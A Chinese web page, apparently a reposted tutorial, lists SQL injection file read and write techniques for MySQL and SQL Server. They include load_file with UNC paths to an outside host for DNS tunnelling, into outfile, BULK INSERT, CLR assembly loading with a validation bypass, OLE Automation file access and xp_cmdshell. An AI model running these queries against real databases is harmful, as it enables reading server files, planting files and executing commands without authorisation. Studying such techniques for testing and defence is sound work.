• 企业400电话
  • 微网小程序
  • AI电话机器人
  • 电商代运营
  • 全 部 栏 目

    企业400电话 网络优化推广 AI电话机器人 呼叫中心 网站建设 商标✡知产 微网小程序 电商运营 彩铃•短信 增值拓展业务
    关于SQL注入中文件读写的方法总结

    前言

    SQL注入有直接sql注入也有文件读写时的注入了我们这篇文章介绍的是SQL注入中的文件读写这一块的内容,具体的一起来看看。

    一、MySQL

    读文件

    常见的读文件,可以用16进制代替字符串

    select load_file('c:/boot.ini')
    select load_file(0x633a2f626f6f742e696e69)
    select load_file('//ecma.io/1.txt') # smb协议
    select load_file('\\\\ecma.io\\1.txt') # 可用于DNS隧道

    写文件

    我暂时已知l两种写文件的方式

    select 0x313233 into outfile 'D:/1.txt'
    select 0x313233 into dumpfile 'D:/1.txt'

    二、 SQL Server

    读文件

    1. BULK INSERT

    create table result(res varchar(8000));
    bulk insert result from 'd:/1.txt';

    2. CLR集成

    // 开启CLR集成
    exec sp_configure 'show advanced options',1;
    reconfigure;
    exec sp_configure 'clr enabled',1
    reconfigure
    create assembly sqb from 'd:\1.exe' with permission_set=unsafe

    上面一句可以利用create assembly函数从远程服务器加载任何.NET二进制文件到数据库中;但是他会验证是否为合法.NET程序,导致失败,下面是读取方式

    select master.dbo.fn_varbintohexstr(cast(content as varbinary)) from sys.assembly_files

    绕过,首先加载一个有效的.NET的二进制文件,然后追加文件即可,下面是绕过方法。

    create assembly sqb from 'd:\net.exe';
    alter assembly sqb add file from 'd:\1.txt'
    alter assembly sqb add file from 'd:\notnet.exe'

    3. Script.FileSystemObject

    # 开启Ole Automation Procedures
     
    sp_configure 'show advanced options',1;
    RECONFIGURE;
    sp_configure 'Ole Automation Procedures',1;
    RECONFIGURE;
    declare @o int, @f int, @t int, @ret int
    declare @line varchar(8000)
    exec sp_oacreate 'scripting.filesystemobject',@o out
    exec sp_oamethod @o, 'opentextfile', @f out, 'd:\1.txt', 1
    exec @ret = sp_onmethod @f, 'readline', @line out
    while(@ret = 0) begin print @line exec @ret = sp_oamethod @f, 'readline', @line out end

    写文件

    1. Script.FileSystemObject

    declare @o int, @f int, @t int, @ret int
    declare @line varchar(8000)
    exec sp_oacreate 'scripting.filesystemobject',@o out
    exec sp_oamethod @o, 'createtextfile', @f out, 'e:\1.txt', 1
    exec @ret = sp_oamethod @f, 'writeline', NULL ,'This is the test string'

    2. BCP复制文件(测试失败,无bcp.exe)

    c:\windows>system32>bcp "select name from sysobjects" query testout.txt -c -s 127.0.0.1 -U sa -p"sa"

    3. xp_cmdshell

    exec xp_cmdshell 'echo test>d:\1.txt'

    三、Oracle

    pass,Oracle太坑了~~~几乎都受到PL/SQL的限制,暂时不讨论

    总结

    以上就是关于SQL注入中文件的读写方法总结,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流。

    您可能感兴趣的文章:
    • 利用SQL注入漏洞登录后台的实现方法
    • 有效防止SQL注入的5种方法总结
    • 利用SQL注入漏洞拖库的方法
    • SQL注入中绕过 单引号 限制继续注入
    • sql注入之手工注入示例详解
    • MySQL 及 SQL 注入与防范方法
    • 防御SQL注入的方法总结
    • SQL数据库的高级sql注入的一些知识
    • SQL 注入式攻击的终极防范
    • sql注入教程之类型以及提交注入
    上一篇:深入讲解SQL中的字符串拼接
    下一篇:关于SQL注入绕过的一些知识点
  • 相关文章
  • 

    © 2016-2020 巨人网络通讯 版权所有

    《增值电信业务经营许可证》 苏ICP备15040257号-8

    关于SQL注入中文件读写的方法总结 关于,SQL,注入,中,文件,读,